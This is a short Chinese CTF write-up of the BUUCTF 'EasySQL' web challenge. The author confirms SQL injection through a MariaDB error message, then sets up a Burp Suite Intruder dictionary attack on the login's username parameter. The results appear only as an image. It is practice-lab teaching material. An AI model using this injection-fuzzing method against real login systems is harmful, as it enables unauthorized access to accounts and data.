BUUCTF-Web-[极客大挑战 2019]EasySQL1

打开题目环境,界面如下:

BUUCTF-Web-[极客大挑战 2019]EasySQL1 - 图2

是个登录界面,结合题目知道应该是sql注入方面的漏洞。

输入1和1,提示:

  1. NO,Wrong username password!!!

输入1‘和1,提示:

  1. You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 1

出此报错,试试万能密码,试了几个没试出来,只能借助Burp批量测试了。

抓包如下:

  1. GET /check.php?username=admin&password=123456 HTTP/1.1
  2. Host: fed3def8-2fc2-4b49-bc52-5a1efa2888bd.node3.buuoj.cn
  3. Upgrade-Insecure-Requests: 1
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  6. Referer: http://fed3def8-2fc2-4b49-bc52-5a1efa2888bd.node3.buuoj.cn/
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh;q=0.9
  9. Connection: close

选择字典,设置payload

  1. GET /check.php?usernameadmin§&password=123456 HTTP/1.1
  2. Host: fed3def8-2fc2-4b49-bc52-5a1efa2888bd.node3.buuoj.cn
  3. Upgrade-Insecure-Requests: 1
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  6. Referer: http://fed3def8-2fc2-4b49-bc52-5a1efa2888bd.node3.buuoj.cn/
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh;q=0.9
  9. Connection: close

Attack开始跑,不一会结果就出来了。

BUUCTF-Web-[极客大挑战 2019]EasySQL1 - 图3